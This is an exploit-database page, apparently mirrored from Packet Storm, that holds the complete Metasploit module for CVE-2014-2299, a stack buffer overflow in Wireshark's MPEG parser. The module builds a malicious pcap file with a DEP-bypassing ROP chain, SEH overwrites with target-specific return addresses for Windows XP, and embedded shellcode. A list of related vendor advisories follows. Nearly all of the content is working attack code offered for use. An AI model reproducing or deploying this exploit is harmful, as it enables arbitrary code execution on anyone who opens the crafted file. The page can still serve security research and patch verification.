Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJ0sm1PACKETSTORM:126337
HistoryApr 25, 2014 - 12:00 a.m.

Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow

2014-04-2500:00:00
j0sm1
packetstormsecurity.com
18

0.95 High

EPSS

Percentile

99.1%

JSON
`#  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',  
'Description' => %q{  
This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5  
by generating an malicious file.)  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Wesley Neelen', # Discovery vulnerability  
'j0sm1', # Exploit and msf module  
],  
'References' =>  
[  
[ 'CVE', '2014-2299'],  
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],  
[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],  
[ 'URL', 'http://www.securityfocus.com/bid/66066/info' ]  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'BadChars' => "\xff",  
'Space' => 600,  
'DisableNops' => 'True',  
'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200   
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'WinXP SP3 Spanish (bypass DEP)',  
{  
'OffSet' => 69732,  
'OffSet2' => 70476,  
'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16)   
'jmpesp' => 0x68e2bfb9,  
}  
],  
[ 'WinXP SP2/SP3 English (bypass DEP)',  
{  
'OffSet2' => 70692,  
'OffSet' => 70476,  
'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module  
'jmpesp' => 0x68e2bfb9,  
}  
],  
],  
'Privileged' => false,  
'DisclosureDate' => 'Mar 20 2014'  
))  
  
register_options(  
[  
OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']),  
], self.class)  
end  
  
def create_rop_chain()  
  
# rop chain generated with mona.py - www.corelan.be  
rop_gadgets =   
[  
0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]  
0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll]  
0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]   
0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]   
0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]  
0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]  
0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]  
0x00000201, # 0x00000201-> ebx  
0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0]   
0x00000040, # 0x00000040-> edx  
0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]  
0x668242b9, # &Writable location [libgnutls-26.dll]  
0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0  
0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll]  
0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]   
0x90909090, # nop  
0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]   
].flatten.pack("V*")  
  
return rop_gadgets  
  
end  
  
def exploit  
  
print_status("Creating '#{datastore['FILENAME']}' file ...")  
  
ropchain = create_rop_chain  
magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure  
# Here we build the packet data  
packet = rand_text_alpha(883)  
packet << "\x6c\x7d\x37\x6c" # NOP RETN  
packet << "\x6c\x7d\x37\x6c" # NOP RETN  
packet << ropchain  
packet << payload.encoded # Shellcode  
packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)  
  
# 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000  
# After nseh and seh we haven't space, then we have to jump to another location.  
  
# When file is open with command line. This is NSEH/SEH overwrite  
packet << make_nops(4) # nseh  
packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN  
  
packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk  
  
# When file is open with GUI interface. This is NSEH/SEH overwrite  
packet << make_nops(4) # nseh  
# seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **  
packet << "\x55\x59\x80\x6b"  
  
print_status("Preparing payload")  
filecontent = magic_header  
filecontent << packet  
print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes")  
file_create(filecontent)  
  
end  
end  
`

Related

prion 1
debiancve 1
seebug 2
kaspersky 1
ubuntucve 1
checkpoint_advisories 1
zdt 1
cve 1
cvelist 1
exploitdb 1
nessus 18
openvas 23
debian 1
osv 1
securityvulns 2
mageia 2
gentoo 1
veracode 9
oraclelinux 2
redhat 2
centos 2
amazon 1
prion
prion
Buffer overflow
2014-03-11 13:01:00
debiancve
debiancve
CVE-2014-2299
2014-03-11 13:01:00
seebug
seebug
Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow
2014-07-01 00:00:00
Wireshark MPEG File Parser 'wiretap/mpeg.c'ηΌ“ε†²εŒΊζΊ’ε‡ΊζΌζ΄ž
2014-03-21 00:00:00
kaspersky
kaspersky
KLA10588 Multiple vulnerabilities in Wireshark
2014-03-07 00:00:00
ubuntucve
ubuntucve
CVE-2014-2299
2014-03-11 00:00:00
checkpoint_advisories
checkpoint_advisories
Wireshark MPEG File Parser Stack Buffer Overflow (CVE-2014-2299)
2014-06-02 00:00:00
zdt
zdt
Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow
2014-04-26 00:00:00
cve
cve
CVE-2014-2299
2014-03-11 13:01:00
cvelist
cvelist
CVE-2014-2299
2014-03-11 01:00:00
exploitdb
exploitdb
Wireshark 1.8.12/1.10.5 - wiretap/mpeg.c Stack Buffer Overflow (Metasploit)
2014-04-28 00:00:00
nessus
nessus
Mandriva Linux Security Advisory : wireshark (MDVSA-2014:050)
2014-03-11 00:00:00
Wireshark 1.8.x < 1.8.13 Multiple Vulnerabilities
2014-03-11 00:00:00
Debian DSA-2871-1 : wireshark - several vulnerabilities
2014-03-11 00:00:00
openvas
openvas
Debian: Security Advisory (DSA-2871-1)
2014-03-09 00:00:00
Wireshark Denial of Service and Code Execution Vulnerabilities-01 (Mar 2014) - Windows
2014-03-14 00:00:00
Debian Security Advisory DSA 2871-1 (wireshark - several vulnerabilities)
2014-03-10 00:00:00
debian
debian
[SECURITY] [DSA 2871-1] wireshark security update
2014-03-10 14:55:52
osv
osv
wireshark - several
2014-03-10 00:00:00
securityvulns
securityvulns
Wireshark multiple security vulnerabilities
2014-03-13 00:00:00
[ MDVSA-2014:050 ] wireshark
2014-03-13 00:00:00
mageia
mageia
Updated wireshark packages fix multiple vulnerabilies
2014-03-09 01:43:28
Updated wireshark packages fix multiple vulnerabilies
2014-03-09 01:44:35
gentoo
gentoo
Wireshark: Multiple vulnerabilities
2014-06-29 00:00:00
veracode
veracode
Denial Of Service (DoS)
2019-05-02 05:02:02
Denial Of Service (DoS)
2019-05-02 05:02:03
Denial Of Service (DoS)
2019-05-02 05:02:02
oraclelinux
oraclelinux
wireshark security update
2014-03-31 00:00:00
wireshark security update
2014-03-31 00:00:00
redhat
redhat
(RHSA-2014:0342) Moderate: wireshark security update
2014-03-31 00:00:00
(RHSA-2014:0341) Moderate: wireshark security update
2014-03-31 00:00:00
centos
centos
wireshark security update
2014-03-31 18:13:23
wireshark security update
2014-03-31 17:51:37
amazon
amazon
Medium: wireshark
2014-04-25 15:57:00

0.95 High

EPSS

Percentile

99.1%

JSON
Related for PACKETSTORM:126337
prion1debiancve1seebug2kaspersky1ubuntucve1checkpoint_advisories1zdt1cve1cvelist1exploitdb1nessus18openvas23debian1osv1securityvulns2mageia2gentoo1veracode9oraclelinux2redhat2centos2amazon1